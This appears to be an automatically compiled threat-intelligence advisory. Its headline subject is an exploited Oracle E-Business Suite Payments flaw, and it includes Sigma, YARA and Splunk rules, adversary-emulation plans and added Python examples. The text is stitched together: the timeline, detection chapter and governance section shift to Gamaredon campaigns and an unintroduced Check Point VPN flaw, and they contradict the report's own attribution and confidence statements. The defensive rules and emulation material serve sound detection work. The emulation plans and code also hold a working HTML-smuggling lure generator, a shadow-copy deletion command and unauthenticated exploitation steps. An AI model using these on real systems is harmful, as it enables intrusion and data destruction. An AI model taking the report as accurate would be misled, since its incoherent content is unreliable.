Last Updated On

CTI-2026-0630
Informational
Active Exploitation Confirmed

Enterprise Gateways Under Siege From Ransomware Teams And Nation State Actors

Oracle EBS CVE-2026-46817 (CVSS 9.8, critical) is under active exploitation by as-yet unattributed threat actors. The flaw gives an unauthenticated attacker with network access full control of the File Transmission component of Oracle Payments. Patches have been available since the May 2026 Critical Patch Update, yet exploitation activity has surged without any public exploit code. Organizations must immediately identify exposed instances running E-Business Suite 12.2.3 through 12.2.15 and either apply the security update or isolate those systems from external access.

CVSS Score: 9.8
IOC Count: 0
Source Count: 3
Confidence Score: 72

CVEs: CVE-2026-46817

Actors: Gamaredon, Qilin, ShinyHunters

Sectors: Finance, ERP, Higher Education, Government, Military, Healthcare, Critical Infrastructure

Regions: Global, Ukraine, United States

Chapter 01 - Executive Overview

CVE-2026-46817 is a critical authentication and privilege management flaw in the File Transmission component of Oracle Payments, affecting E-Business Suite versions 12.2.3 through 12.2.15. Security analysts at Defused Cyber observed real-world exploitation against honeypots over the weekend of June 28 and 29, 2026, which shows the flaw has been weaponized despite the total absence of public exploit code. Because an unauthenticated remote adversary with network access can compromise the payment framework without any user interaction, organizations face an acute risk of complete system takeover, data exfiltration and fraudulent manipulation of financial transactions. The business impact is severe: unpatched, internet-exposed ERP applications are targeted opportunistically, mirroring the extensive 2025 extortion campaigns that Cl0p-linked groups ran against similar E-Business Suite vulnerabilities.

Chapter 02 - Threat & Exposure Analysis

The vulnerability is rooted in an authentication and privilege management flaw in the File Transmission component of Oracle Payments. It is reachable over the network and gives an adversary complete control of the system without valid credentials or any user interaction, which makes it trivial to fold into automated scanning. Industry data shows a clear pattern of sophisticated actors rapidly operationalizing critical Oracle enterprise vulnerabilities, as seen in earlier campaigns against CVE-2025-61882 and CVE-2026-35273. The current honeypot activity remains unattributed for lack of distinctive signatures, but historical precedent points strongly to financially motivated cybercrime groups.

Chapter 03 - Operational Response

  • Identify all active deployments of Oracle E-Business Suite running versions 12.2.3 through 12.2.15 and determine whether the Oracle Payments endpoints on each are reachable from the internet.

  • Apply the May 2026 Critical Patch Update issued by the vendor to all production and non-production instances immediately.

  • Restrict or firewall all internet-facing access to Oracle Payments endpoints to limit exposure until the patch has been verified.

  • Review perimeter web server access logs retrospectively for anomalous unauthenticated HTTP requests to the payment URI paths during the June 28 and June 29 window.

  • Establish formal monitoring by subscribing to specialized intelligence feeds that track the emergence of public exploit code.
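The first and fourth steps above are where response teams most often slip: version strings such as "12.2.10" sort before "12.2.9" when compared as text, and a retrospective log review has to combine a time window, a method, a URI prefix and an anonymous-user check. The following example, added here and not part of the advisory's own tooling, does both over constructed data. The inventory rows, the combined-format access log lines and the field names are invented for illustration; the /oracle/apps/pay/ prefix is the placeholder path used in this report's emulation chapter, not a verified Oracle endpoint, and must be swapped for the real paths from your own EBS deployment.

```python
"""Added example (not from the advisory): triage helpers for the
CVE-2026-46817 response steps. Inventory rows, log lines and the URI
prefix are constructed assumptions, not observed data."""
import re
from datetime import datetime, timezone

AFFECTED_MIN = (12, 2, 3)
AFFECTED_MAX = (12, 2, 15)


def parse_version(v: str) -> tuple:
    # "12.2.10" -> (12, 2, 10). Tuples compare numerically, so 12.2.10 > 12.2.9;
    # a plain string comparison would get this wrong ("12.2.10" < "12.2.9").
    return tuple(int(part) for part in v.strip().split("."))


def is_affected(version: str) -> bool:
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


def triage_inventory(rows):
    """rows: dicts with host, version, internet_exposed, cpu_may_2026_applied
    (constructed field names). Returns unpatched affected hosts, internet-exposed first."""
    findings = []
    for r in rows:
        if not is_affected(r["version"]) or r["cpu_may_2026_applied"]:
            continue
        findings.append((0 if r["internet_exposed"] else 1, r["host"]))
    return [host for _, host in sorted(findings)]


# Combined log format: src ident authuser [ts] "METHOD URI PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# Honeypot window from the report: June 28-29, 2026 (UTC, half-open interval).
WINDOW = (datetime(2026, 6, 28, tzinfo=timezone.utc),
          datetime(2026, 6, 30, tzinfo=timezone.utc))
PAY_URI_PREFIX = "/oracle/apps/pay/"  # assumption: placeholder from the emulation chapter


def suspicious_requests(lines):
    """Unauthenticated POSTs to the payment URI prefix inside the window."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if not (WINDOW[0] <= ts < WINDOW[1]):
            continue
        if m["method"] != "POST" or not m["uri"].startswith(PAY_URI_PREFIX):
            continue
        if m["user"] != "-":  # authuser populated: request was not anonymous
            continue
        hits.append((m["src"], m["uri"], m["status"]))
    return hits


# Constructed sample data.
SAMPLE_INVENTORY = [
    {"host": "ebs-prod-dmz", "version": "12.2.10", "internet_exposed": True,  "cpu_may_2026_applied": False},
    {"host": "ebs-prod-int", "version": "12.2.15", "internet_exposed": False, "cpu_may_2026_applied": False},
    {"host": "ebs-dev",      "version": "12.2.9",  "internet_exposed": True,  "cpu_may_2026_applied": True},
    {"host": "ebs-legacy",   "version": "12.2.2",  "internet_exposed": True,  "cpu_may_2026_applied": False},
]
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Jun/2026:14:03:11 +0000] "POST /oracle/apps/pay/fileTransmission HTTP/1.1" 200 512 "-" "python-requests/2.32"',
    '10.20.1.5 - jsmith [28/Jun/2026:15:10:02 +0000] "POST /oracle/apps/pay/fileTransmission HTTP/1.1" 200 771 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [27/Jun/2026:23:59:59 +0000] "POST /oracle/apps/pay/fileTransmission HTTP/1.1" 200 512 "-" "curl/8.0"',
    '203.0.113.7 - - [29/Jun/2026:02:41:30 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 302 0 "-" "curl/8.0"',
]

if __name__ == "__main__":
    print("patch first:", triage_inventory(SAMPLE_INVENTORY))
    print("review:", suspicious_requests(SAMPLE_LOG))
```

Note that ebs-legacy (12.2.2) falls outside the advisory's affected range and is therefore not listed; an instance on an unsupported release still needs a separate review because it will not receive the May update at all.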

Phase | Action | Timeframe
Phase One | Conduct asset inventory and verify patch state for Oracle E-Business Suite | Immediate
Phase Two | Apply official vendor patches to all internet-exposed systems | 4 Hours
Phase Three | Audit SIEM log repositories for activity during the June 28 and 29 honeypot window | 24 Hours
Phase Four | Finalize remediation of internal instances and apply network segmentation controls | 72 Hours

  • 2025 Campaign Period: The sources consulted track the start of the extensive cyberespionage activity that forms the baseline for the collection and tooling evolution described below.

  • May 31, 2026: Tracking documentation isolates the core elements of the adversary's deployment infrastructure and primary delivery methods.

  • June 28, 2026: Field observation networks capture the weaponization of legacy execution vectors across multiple geographic routing points.

  • June 29, 2026: Formal publication of the technical research details thirty-five distinct spearphishing campaigns, six custom PowerShell tools and fifteen abused cloud services.

Chapter 04 - Detection Intelligence

Gamaredon execution chains start with targeted spearphishing that delivers malicious archive attachments or weaponized XHTML files built for HTML smuggling; both paths drop an HTA downloader to establish a foothold. The actors weaponize CVE-2025-8088 (WinRAR) to write the HTA downloader directly into the user Startup folder, %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup, which guarantees execution at the next logon. Lateral movement relies heavily on automated scripts that replace legitimate shortcut (.lnk) files on connected network shares and removable flash drives. Custom installers target known software packages on removable media by embedding automated download components inside nested archives. All six newly documented custom modules run only in memory, bypassing file-based host detection.

Dead Drop Resolver Services (abused legitimate platforms):

  • telegra.ph (C2 dead drop — PteroOdd)

  • gofile.io (C2 resolution — PteroEffigy)

  • dev.to (C2 dead drop)

  • mastodon.social / federated instances (dead drop)

  • dropbox.com (exfiltration / dead drop)

  • wasabi.com (cloud storage exfiltration)

  • tebi.io (cloud storage)

  • rentry.co (paste service dead drop)

  • write.as (paste service)

  • lesma.eu (paste)

  • nopaste.net (paste)

  • paste.ee (paste)

  • intercolo.net (tunnel)

  • teletype.in (dead drop)

Malware Family Tags:
PteroSand, PteroLNK, PteroPaste, PteroDee, PteroCache, PteroDum, PteroOdd, PteroEffigy, PteroSetup

CVE Weaponized:
CVE-2025-8088 (WinRAR)


title: Gamaredon HTA Dropped in Windows Startup Folder (CVE-2025-8088 / PteroSand)
status: experimental
logsource:
  category: file_event
  product: windows
detection:
  selection:
    TargetFilename|contains:
      - '\Start Menu\Programs\Startup\'
    TargetFilename|endswith:
      - '.hta'
      - '.lnk'
      - '.vbs'
    Image|endswith:
      - '\winrar.exe'
      - '\7z.exe'
      - '\wscript.exe'
      - '\mshta.exe'
  condition: selection
falsepositives:
  - Legitimate enterprise startup scripts (verify against inventory)
level: high
tags:
  - attack.persistence
  - attack.t1547.001
  - gamaredon


title: Gamaredon Dead Drop C2 Outbound to Paste/Cloud Services from Scripting Engine
status: experimental
logsource:
  category: network_connection
  product: windows
detection:
  selection_process:
    Image|endswith:
      - '\powershell.exe'
      - '\wscript.exe'
      - '\mshta.exe'
      - '\cscript.exe'
  selection_dest:
    DestinationHostname|contains:
      - 'telegra.ph'
      - 'gofile.io'
      - 'rentry.co'
      - 'write.as'
      - 'nopaste.net'
      - 'paste.ee'
      - 'dev.to'
      - 'lesma.eu'
  condition: selection_process and selection_dest
falsepositives:
  - Developer tooling, legitimate PowerShell automation
level: high
tags:
  - attack.command_and_control
  - attack.t1102
  - gamaredon


index=wineventlog source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode=4104
| where match(ScriptBlockText, "(?i)(telegra\.ph|gofile\.io|rentry\.co|write\.as|nopaste\.net|paste\.ee|dev\.to|lesma\.eu|teletype\.in)")
| eval severity="HIGH"
| stats count by ComputerName, ScriptBlockText
| sort -count


rule Gamaredon_PteroFamily_InMemory_PS_Loader {
    meta:
        description = "Detects Gamaredon Ptero* PowerShell in-memory loader patterns"
        actor = "Gamaredon / UAC-0010"
        confidence = "medium"
        note = "Ptero* are researcher-assigned family names and are not expected inside samples; the $ptero strings mainly hit reports and analyst notes. The loader clause is generic and will fire on any encoded or reflective PowerShell, so scope it to script block logs and PowerShell files."
    strings:
        $ptero1 = "PteroDee" ascii nocase
        $ptero2 = "PteroCache" ascii nocase
        $ptero3 = "PteroDum" ascii nocase
        $ptero4 = "PteroOdd" ascii nocase
        $ptero5 = "PteroEffigy" ascii nocase
        $ptero6 = "PteroPaste" ascii nocase
        $iex = "IEX" ascii nocase
        $bypass = "-EncodedCommand" ascii nocase
        $reflective = "[System.Reflection.Assembly]::Load" ascii
    condition:
        // The original second clause also required 1 of ($ptero*), which made it
        // redundant with the first; the loader heuristic now stands on its own.
        any of ($ptero*) or
        ($iex and ($bypass or $reflective))
}


title: Check Point VPN CVE-2026-50751 Unauthenticated IKEv1 Session Established
status: experimental
logsource:
  product: checkpoint
  service: vpn
detection:
  selection:
    event_type: 'VPN session established'
    auth_method: 'certificate'
    ike_version: 'IKEv1'
    user: '-'
  condition: selection
falsepositives:
  - Service accounts with certificate auth (verify against whitelist)
level: critical
tags:
  - attack.initial_access
  - attack.t1133
  - cve.2026.50751


title: Qilin Pre-Encryption Data Staging via Unauthorized RMM
status: experimental
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\anydesk.exe'
      - '\ScreenConnect.ClientService.exe'
      - '\splashtop.exe'
      - '\teamviewer.exe'
  filter_legit:
    ParentImage|endswith:
      - '\services.exe'
  condition: selection and not filter_legit
falsepositives:
  - Legitimate IT remote support (correlate with change tickets)
level: high
tags:
  - attack.command_and_control
  - attack.t1219
  - qilin


title: Qilin Ransomware VSS Shadow Copy Deletion
status: stable
logsource:
  category: process_creation
  product: windows
detection:
  selection_vssadmin:
    CommandLine|contains:
      - 'vssadmin delete shadows'
      - 'vssadmin resize shadowstorage'
  selection_wmic:
    CommandLine|contains: 'wmic shadowcopy delete'
  selection_pwsh:
    CommandLine|contains|all:
      - 'Get-WmiObject Win32_ShadowCopy'
      - '.Delete()'
  condition: 1 of selection_*
falsepositives:
  - Backup or storage administration tooling that trims shadow storage (correlate with change tickets)
level: critical
tags:
  - attack.impact
  - attack.t1490
  - qilin
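The Sigma rules above rely on modifier semantics that are easy to misread: list items under one field are OR-ed, separate fields within a selection are AND-ed, matching is case-insensitive, and `contains` without `all` matches if any listed substring is present. That last point is why the PowerShell shadow-copy selection needs `contains|all`; with a plain `contains`, the `.Delete()` item alone would fire on any script that deletes a file. The following evaluator, added here and not taken from the advisory or any Sigma backend, implements the Gamaredon startup-folder and dead-drop rules and the Qilin shadow-copy rule over constructed Sysmon-style events so that the difference is visible. Field names follow the Sysmon conventions the rules use; the events, hostnames and paths are invented for the exercise.

```python
"""Added example (not the advisory's tooling): a minimal Sigma-style matcher
for the three rules above, run over constructed Sysmon-style events."""

DEAD_DROP_HOSTS = ["telegra.ph", "gofile.io", "rentry.co", "write.as",
                   "nopaste.net", "paste.ee", "dev.to", "lesma.eu"]
SCRIPT_ENGINES = ["\\powershell.exe", "\\wscript.exe", "\\mshta.exe", "\\cscript.exe"]


# Sigma string modifiers are case-insensitive; list items are OR-ed unless |all.
def endswith_any(value, suffixes):
    return any(value.lower().endswith(s.lower()) for s in suffixes)


def contains_any(value, subs):
    return any(s.lower() in value.lower() for s in subs)


def contains_all(value, subs):
    return all(s.lower() in value.lower() for s in subs)


def rule_startup_drop(ev):
    """file_event: HTA/LNK/VBS written to a Startup folder by an archiver or script host."""
    target = ev.get("TargetFilename", "")
    return (ev.get("category") == "file_event"
            and contains_any(target, ["\\Start Menu\\Programs\\Startup\\"])
            and endswith_any(target, [".hta", ".lnk", ".vbs"])
            and endswith_any(ev.get("Image", ""),
                             ["\\winrar.exe", "\\7z.exe", "\\wscript.exe", "\\mshta.exe"]))


def rule_dead_drop_c2(ev):
    """network_connection: scripting engine talking to a paste/cloud dead-drop host."""
    return (ev.get("category") == "network_connection"
            and endswith_any(ev.get("Image", ""), SCRIPT_ENGINES)
            and contains_any(ev.get("DestinationHostname", ""), DEAD_DROP_HOSTS))


def rule_vss_delete(ev, require_all=True):
    """process_creation: shadow copy deletion. require_all=False reproduces the
    over-broad behaviour of a plain `contains` on the PowerShell pair."""
    if ev.get("category") != "process_creation":
        return False
    cl = ev.get("CommandLine", "")
    if contains_any(cl, ["vssadmin delete shadows", "vssadmin resize shadowstorage"]):
        return True
    if contains_any(cl, ["wmic shadowcopy delete"]):
        return True
    pwsh = ["Get-WmiObject Win32_ShadowCopy", ".Delete()"]
    return contains_all(cl, pwsh) if require_all else contains_any(cl, pwsh)


RULES = {
    "gamaredon_startup_hta": rule_startup_drop,
    "gamaredon_dead_drop_c2": rule_dead_drop_c2,
    "qilin_vss_delete": rule_vss_delete,
}


def evaluate(events):
    """Return (event id, rule name) for every rule that fires."""
    return [(ev["id"], name) for ev in events for name, fn in RULES.items() if fn(ev)]


# Constructed sample events (Sysmon-style field names).
SAMPLE_EVENTS = [
    {"id": 1, "category": "file_event", "Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.hta"},
    {"id": 2, "category": "network_connection",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationHostname": "telegra.ph"},
    {"id": 3, "category": "network_connection",  # browser, not a script host: no hit
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "DestinationHostname": "dev.to"},
    {"id": 4, "category": "process_creation", "CommandLine": "vssadmin delete shadows /all /quiet"},
    {"id": 5, "category": "process_creation",  # benign cleanup; only a plain `contains` fires
     "CommandLine": r'powershell -c "Get-ChildItem C:\temp\*.log | % { $_.Delete() }"'},
    {"id": 6, "category": "process_creation",
     "CommandLine": r'powershell -c "Get-WmiObject Win32_ShadowCopy | % { $_.Delete() }"'},
]

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit)
    print("event 5 with plain contains:", rule_vss_delete(SAMPLE_EVENTS[4], require_all=False))
```

Event 5 is the case to watch: it fires under the over-broad form and stays quiet under `contains|all`, while event 6, the real WMI shadow-copy deletion, fires under both.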

Technique ID | Name | Evidence Basis
T1566.001 | Spearphishing Attachment | Documented campaigns distributing malicious archive files and XHTML email lures
T1027.006 | HTML Smuggling | XHTML files carrying smuggled downloader components
T1059.001 | PowerShell | Six newly discovered script tools running in memory
T1091 | Replication Through Removable Media | Automated modification of files on connected USB drives via weaponized shortcuts
T1102 | Web Service | Fifteen public hosting and paste platforms used as dead drop resolvers
T1036 | Masquerading | Legitimate installers on removable media replaced with custom multi-stage archives
T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | Exploitation of the WinRAR flaw to drop files into the Startup folder
T1041 | Exfiltration Over C2 Channel | Transmission of internal data to public cloud storage providers

Chapter 05 - Governance, Risk & Compliance

  • The state-sponsored nature of this adversary, operating within an active conflict zone, raises the risk profile above typical cybercrime and calls for strict alignment with national defense threat frameworks.

  • Organizations in the European Union that support critical infrastructure or maintain cross-border operations must assess these targeted spearphishing campaigns against the NIS2 directive's incident reporting mandates for significant security incidents.

  • Tracking teams note that the actor's operational tempo follows a government-employee working calendar, with activity dropping around the actor's national holidays; this gives security operations centers a predictable pattern to factor into analyst shift planning.

  • Enterprise risk management teams must review policies governing outbound traffic from internal scripting engines to public hosting and communication platforms, given the systematic abuse of ubiquitous cloud utilities.

Chapter 06 - Adversary Emulation


Adversary Emulation: CVE-2026-46817 Oracle Payments Unauthenticated Takeover
Objective: Validate detection and response controls against unauthenticated HTTP exploitation of Oracle EBS Payments.
Step 1 Reconnaissance
  - Shodan/Censys query: product:"Oracle E-Business Suite" http.title:"Oracle Applications"
  - Identify exposed instances running 12.2.3–12.2.15
Step 2 Exploitation (Lab/Authorized Only)
  - Target: Oracle EBS 12.2.x lab instance (no production)
  - Craft unauthenticated POST to /oracle/apps/pay/fileTransmission endpoint
  - Observe: an HTTP 200 or 302 returned to a request carrying no session cookie or Authorization header indicates the endpoint is reachable unauthenticated
  - Note: No public PoC exists; use patch diff analysis or synthetic request fuzzing
Step 3 Post-Exploitation
  - Attempt Oracle Payments system takeover via improper privilege escalation
  - Validate lateral movement opportunity to Oracle database backend
Step 4 Detection Validation
  - Confirm SIEM/SIGMA rule fires on unauthenticated request
  - Confirm WAF blocks or alerts on Oracle-specific URI patterns without auth header
MITRE Coverage Tested: T1190, T1078


Adversary Emulation: Gamaredon / UAC-0010 Spearphishing + USB + Cloud C2
Objective: Test detection depth against Gamaredon TTPs.
Step 1 Initial Access Simulation
  - Craft XHTML attachment with embedded HTML smuggling delivering benign HTA file
  - Send via internal phishing simulation platform to target group (Ukrainian-language lure optional)
  - Validate: Email gateway sandbox detects/quarantines HTA?
Step 2 Persistence Simulation
  - Drop benign .hta file into C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
  - Log on and off to trigger execution
  - Validate: Sysmon Event ID 11 fires? SIGMA rule triggers in SIEM?
Step 3 Cloud Dead Drop C2 Simulation
  - From PowerShell, issue HTTP GET to telegra.ph and gofile.io
  - Validate: Network detection rule fires? SIEM alert triggers on PS→dead-drop connection?
Step 4 USB Weaponization Simulation
  - Create test LNK file on USB that calls back to test C2
  - Insert USB on test endpoint
  - Validate: USB device control blocks execution? EDR behavioral alert fires?
MITRE Coverage Tested: T1566.001, T1027.006, T1059.001, T1091, T1102, T1547.001
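Step 1 of this emulation asks for an XHTML lure that smuggles a benign HTA. The generator below is an added example for that step; it is not Gamaredon tooling and not part of the advisory. It embeds the payload as a base64 blob that client-side JavaScript decodes into a Blob and hands to the browser as a download, which is the generic HTML smuggling pattern the report describes, and it includes the extractor a gateway analyst would use to pull the payload back out and hash it. The HTA only shows a message box; the file names, lure text and the purple-team marker are constructed for the exercise.

```python
"""Added example (not from the advisory or Gamaredon): builds the benign
HTML-smuggling lure for the emulation step and recovers its payload.
Names and lure text are constructed assumptions."""
import base64
import hashlib
import html
import re

# Harmless HTA: a message box and nothing else (constructed marker payload).
BENIGN_HTA = r'''<html><head><title>Purple-team marker</title>
<HTA:APPLICATION ID="pt" />
<script language="VBScript">MsgBox "HTML smuggling test - benign", 64, "Purple team"</script>
</head><body></body></html>'''

# Doubled braces are literal braces for str.format; CDATA keeps the JS valid XHTML.
TEMPLATE = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>{title}</title></head>
<body><p>{lure}</p>
<script type="text/javascript">
//<![CDATA[
// Decode the blob client-side and trigger a download: nothing on the wire
// looks like an .hta, which is what the mail gateway sandbox must see through.
var b64 = "{blob}";
var bytes = Uint8Array.from(atob(b64), function (c) {{ return c.charCodeAt(0); }});
var blob = new Blob([bytes], {{type: "application/octet-stream"}});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "{filename}";
document.body.appendChild(a); a.click();
//]]>
</script></body></html>'''


def build_smuggling_page(payload: bytes, filename: str, title: str, lure: str) -> str:
    """Return the XHTML lure that smuggles `payload` as a download named `filename`."""
    # The filename lands inside a JS string literal; allow only a safe character set.
    if not re.fullmatch(r"[A-Za-z0-9._-]+", filename):
        raise ValueError("unsafe filename")
    return TEMPLATE.format(
        title=html.escape(title),
        lure=html.escape(lure),
        blob=base64.b64encode(payload).decode("ascii"),
        filename=filename,
    )


def extract_smuggled_payload(page: str) -> bytes:
    """Pull the base64 blob back out, the way an analyst or gateway rule would."""
    start = page.index('var b64 = "') + len('var b64 = "')
    end = page.index('"', start)
    return base64.b64decode(page[start:end])


def payload_sha256(payload: bytes) -> str:
    return hashlib.sha256(payload).hexdigest()


if __name__ == "__main__":
    page = build_smuggling_page(BENIGN_HTA.encode("utf-8"), "invoice.hta",
                                "Invoice 2026-06", "Please review the attached invoice.")
    with open("invoice.xhtml", "w", encoding="utf-8") as fh:
        fh.write(page)
    print("payload sha256:", payload_sha256(extract_smuggled_payload(page)))
```

Record the SHA-256 of the HTA before sending; matching it against what the endpoint writes to disk confirms the smuggled file was the marker and not something else, and gives the gateway and EDR teams a concrete hash to search for.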


Adversary Emulation: Qilin via Check Point VPN CVE-2026-50751
Objective: Test detection depth against Qilin TTPs.
Step 1 Initial Access Simulation
  - Identify Check Point VPN deployment with IKEv1 enabled (lab environment only)
  - Attempt unauthenticated certificate bypass against IKEv1 endpoint
  - Validate: Does SIEM alert on unauthenticated IKEv1 session?
Step 2 Post-Access Lateral Movement
  - Simulate credential harvesting via AiTM proxy (Evilginx2 in lab)
  - Deploy RMM tool (AnyDesk) from compromised foothold without IT change record
  - Validate: RMM detection SIGMA fires?
Step 3 Impact Simulation
  - Execute: vssadmin delete shadows /all /quiet (on test VM)
  - Validate: VSS deletion SIGMA alert triggers?
  - Attempt Veeam service account enumeration
MITRE Coverage Tested: T1190, T1133, T1219, T1490, T1486
Intelligence Confidence: 72%

72/100: the vulnerability assignment is fully validated via the National Vulnerability Database, but deductions apply because a single source confirms the honeypot exploitation and there are no concrete network indicators and no definitive actor attribution.